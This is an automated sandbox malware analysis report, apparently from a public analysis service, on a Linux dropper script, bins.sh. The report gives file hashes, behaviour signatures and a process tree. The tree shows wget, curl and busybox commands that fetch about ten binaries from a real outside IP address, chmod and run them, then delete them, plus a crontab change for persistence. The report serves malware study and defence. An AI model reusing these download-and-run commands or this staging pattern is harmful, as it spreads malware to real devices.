Analysis
max time kernel: 15s
max time network: 41s
platform: debian-9_armhf
resource: debian9-armhf-20240611-en
resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 27-10-2024 03:07
Static task: static1
Behavioral task behavioral1: sample bins.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample bins.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample bins.sh, resource debian9-mipsbe-20240611-en
Behavioral task behavioral4: sample bins.sh, resource debian9-mipsel-20240611-en
General
Target: bins.sh
Size: 10KB
MD5: f1355bcf61566b8e884726b7afa77f2d
SHA1: ad708c314476785e25d5f6f0ae6f3197e3d9f904
SHA256: e329bfb94581ca68903cc299500255516655f8e868f49a0ff27e47e9f55ad6aa
SHA512: f0d0c07f3e32c570f67cb4e05b10b8d02429b384779c6d0dcd5963022b236efd248c606fe6e1e43e974fb986804a039df540bbf1a38198dfc4682c296198178e
SSDEEP: 96:Z00fw0gjGqoiYoTProP3uZjsH4wDyuv/zQddPKQXhwXhUXh+WXhyXhCXhnsGK/zj:8+cIl/zQddPK0UgHqae/zQddrUgHqaVM
Malware Config
Signatures

File and Directory Permissions Modification (1 TTP, 10 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
Processes (pid, process):
  740 chmod
  765 chmod
  784 chmod
  800 chmod
  806 chmod
  681 chmod
  702 chmod
  813 chmod
  820 chmod
  827 chmod

Executes dropped EXE (10 IoCs)
Processes (pid, process, path):
  682 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ  /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
  704 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1  /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1
  741 ekoIDag2IrendezgvRAX8H4MvHggSiH31v  /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v
  766 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6  /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6
  786 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5  /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5
  801 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT  /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT
  807 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M  /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M
  814 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub  /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub
  821 OESnKxfsceE83uK3qyhjMDf2qeykBknq50  /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50
  828 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr  /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr

Renames itself (1 IoC)
Processes (pid, process):
  742 ekoIDag2IrendezgvRAX8H4MvHggSiH31v

Creates/modifies Cron job (1 TTP, 1 IoC)
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes (description, ioc, process):
  File opened for modification  /var/spool/cron/crontabs/tmp.mNXacx  crontab

Enumerates running processes
Discovers information about currently running processes on the system
Checks CPU configuration (1 TTP, 10 IoCs)
Checks CPU information that indicates whether the system is a virtual machine.
Processes (description, ioc, process):
  File opened for reading  /proc/cpuinfo  curl  (10 identical rows, one per curl process)

Reads runtime system information
Processes (description, ioc, process); identical description/process pairs are grouped, with every ioc listed:
  File opened for reading  /proc/<pid>/cmdline  ekoIDag2IrendezgvRAX8H4MvHggSiH31v  (48 rows, for pids 768, 783, 797, 27, 754, 756, 810, 762, 805, 20, 812, 803, 104, 758, 14, 28, 142, 2, 25, 739, 138, 788, 156, 751, 776, 595, 656, 792, 649, 775, 773, 22, 307, 11, 17, 271, 790, 8, 720, 13, 135, 588, 10, 764, 305, 769, 6, 818)
  File opened for reading  /proc/sys/crypto/fips_enabled  curl  (8 rows)
  File opened for reading  /proc/self/auxv  curl  (6 rows)
  File opened for reading  /proc/filesystems  crontab  (2 rows)
Writes file to tmp directory (16 IoCs)
Malware often drops required files in the /tmp directory.
Processes (description, ioc, process):
  File opened for modification  /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1  wget
  File opened for modification  /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v  curl
  File opened for modification  /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT  busybox
  File opened for modification  /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M  busybox
  File opened for modification  /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub  busybox
  File opened for modification  /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ  curl
  File opened for modification  /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ  busybox
  File opened for modification  /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v  wget
  File opened for modification  /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v  busybox
  File opened for modification  /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ  wget
  File opened for modification  /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1  busybox
  File opened for modification  /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50  busybox
  File opened for modification  /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr  busybox
  File opened for modification  /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5  busybox
  File opened for modification  /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1  curl
  File opened for modification  /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6  busybox
Processes (indented by depth in the process tree; signatures hit by each process in brackets)
PID 650  /tmp/bins.sh: /tmp/bins.sh
  PID 652  /bin/rm: /bin/rm bins.sh
  PID 654  /usr/bin/wget: wget http://87.120.84.230/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ  [Writes file to tmp directory]
  PID 674  /usr/bin/curl: curl -O http://87.120.84.230/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 680  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ  [Writes file to tmp directory]
  PID 681  /bin/chmod: chmod 777 XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ  [File and Directory Permissions Modification]
  PID 682  /tmp/XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ: ./XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ  [Executes dropped EXE]
  PID 684  /bin/rm: rm XYHklBiqfujIKoRXay6HBx7UXGt0nfCNIZ
  PID 685  /usr/bin/wget: wget http://87.120.84.230/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1  [Writes file to tmp directory]
  PID 688  /usr/bin/curl: curl -O http://87.120.84.230/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1  [Checks CPU configuration; Writes file to tmp directory]
  PID 698  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1  [Writes file to tmp directory]
  PID 702  /bin/chmod: chmod 777 jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1  [File and Directory Permissions Modification]
  PID 704  /tmp/jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1: ./jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1  [Executes dropped EXE]
  PID 706  /bin/rm: rm jlyvvLRrfT35bcmWehYNHktXUdfkPHsnX1
  PID 708  /usr/bin/wget: wget http://87.120.84.230/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v  [Writes file to tmp directory]
  PID 718  /usr/bin/curl: curl -O http://87.120.84.230/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v  [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  PID 734  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/ekoIDag2IrendezgvRAX8H4MvHggSiH31v  [Writes file to tmp directory]
  PID 740  /bin/chmod: chmod 777 ekoIDag2IrendezgvRAX8H4MvHggSiH31v  [File and Directory Permissions Modification]
  PID 741  /tmp/ekoIDag2IrendezgvRAX8H4MvHggSiH31v: ./ekoIDag2IrendezgvRAX8H4MvHggSiH31v  [Executes dropped EXE; Renames itself; Reads runtime system information]
    PID 743  /bin/sh: sh -c "crontab -l"
      PID 744  /usr/bin/crontab: crontab -l  [Reads runtime system information]
    PID 746  /bin/sh: sh -c "crontab -"
      PID 747  /usr/bin/crontab: crontab -  [Creates/modifies Cron job; Reads runtime system information]
  PID 750  /bin/rm: rm ekoIDag2IrendezgvRAX8H4MvHggSiH31v
  PID 754  /usr/bin/wget: wget http://87.120.84.230/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6
  PID 755  /usr/bin/curl: curl -O http://87.120.84.230/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6  [Checks CPU configuration]
  PID 756  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6  [Writes file to tmp directory]
  PID 765  /bin/chmod: chmod 777 qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6  [File and Directory Permissions Modification]
  PID 766  /tmp/qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6: ./qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6  [Executes dropped EXE]
  PID 768  /bin/rm: rm qKsJYqqaHgT1juaVgVU4EiWoIti1A8Y2I6
  PID 769  /usr/bin/wget: wget http://87.120.84.230/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5
  PID 773  /usr/bin/curl: curl -O http://87.120.84.230/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5  [Checks CPU configuration; Reads runtime system information]
  PID 776  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5  [Writes file to tmp directory]
  PID 784  /bin/chmod: chmod 777 Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5  [File and Directory Permissions Modification]
  PID 786  /tmp/Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5: ./Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5  [Executes dropped EXE]
  PID 787  /bin/rm: rm Akt3SmYE1yJUniTp4qSnA4mTwAHM6ZsrR5
  PID 789  /usr/bin/wget: wget http://87.120.84.230/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT
  PID 790  /usr/bin/curl: curl -O http://87.120.84.230/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT  [Checks CPU configuration; Reads runtime system information]
  PID 793  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT  [Writes file to tmp directory]
  PID 800  /bin/chmod: chmod 777 lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT  [File and Directory Permissions Modification]
  PID 801  /tmp/lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT: ./lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT  [Executes dropped EXE]
  PID 802  /bin/rm: rm lYco0C5yriUtJuYiJXGWNob4cNWwcChOKT
  PID 803  /usr/bin/wget: wget http://87.120.84.230/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M
  PID 804  /usr/bin/curl: curl -O http://87.120.84.230/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M  [Checks CPU configuration; Reads runtime system information]
  PID 805  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M  [Writes file to tmp directory]
  PID 806  /bin/chmod: chmod 777 XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M  [File and Directory Permissions Modification]
  PID 807  /tmp/XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M: ./XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M  [Executes dropped EXE]
  PID 809  /bin/rm: rm XECkG1kmoIxr0MTmdoVnZUSdT5snBRBy5M
  PID 810  /usr/bin/wget: wget http://87.120.84.230/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub
  PID 811  /usr/bin/curl: curl -O http://87.120.84.230/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub  [Checks CPU configuration; Reads runtime system information]
  PID 812  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub  [Writes file to tmp directory]
  PID 813  /bin/chmod: chmod 777 jOzMYLHbxyt0kils26CsOKO81vlByx9Cub  [File and Directory Permissions Modification]
  PID 814  /tmp/jOzMYLHbxyt0kils26CsOKO81vlByx9Cub: ./jOzMYLHbxyt0kils26CsOKO81vlByx9Cub  [Executes dropped EXE]
  PID 816  /bin/rm: rm jOzMYLHbxyt0kils26CsOKO81vlByx9Cub
  PID 817  /usr/bin/wget: wget http://87.120.84.230/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50
  PID 818  /usr/bin/curl: curl -O http://87.120.84.230/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50  [Checks CPU configuration; Reads runtime system information]
  PID 819  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/OESnKxfsceE83uK3qyhjMDf2qeykBknq50  [Writes file to tmp directory]
  PID 820  /bin/chmod: chmod 777 OESnKxfsceE83uK3qyhjMDf2qeykBknq50  [File and Directory Permissions Modification]
  PID 821  /tmp/OESnKxfsceE83uK3qyhjMDf2qeykBknq50: ./OESnKxfsceE83uK3qyhjMDf2qeykBknq50  [Executes dropped EXE]
  PID 823  /bin/rm: rm OESnKxfsceE83uK3qyhjMDf2qeykBknq50
  PID 824  /usr/bin/wget: wget http://87.120.84.230/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr
  PID 825  /usr/bin/curl: curl -O http://87.120.84.230/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr  [Checks CPU configuration; Reads runtime system information]
  PID 826  /bin/busybox: /bin/busybox wget http://87.120.84.230/bins/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr  [Writes file to tmp directory]
  PID 827  /bin/chmod: chmod 777 B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr  [File and Directory Permissions Modification]
  PID 828  /tmp/B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr: ./B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr  [Executes dropped EXE]
  PID 829  /bin/rm: rm B76FNq2p1U6lIJhCOLQYRO8K2xf4wxLITr
  PID 830  /usr/bin/wget: wget http://87.120.84.230/bins/IGmSlx5LutgSNWTCx8lNf3IJNptDMjyead
Network
MITRE ATT&CK Enterprise v15
Downloads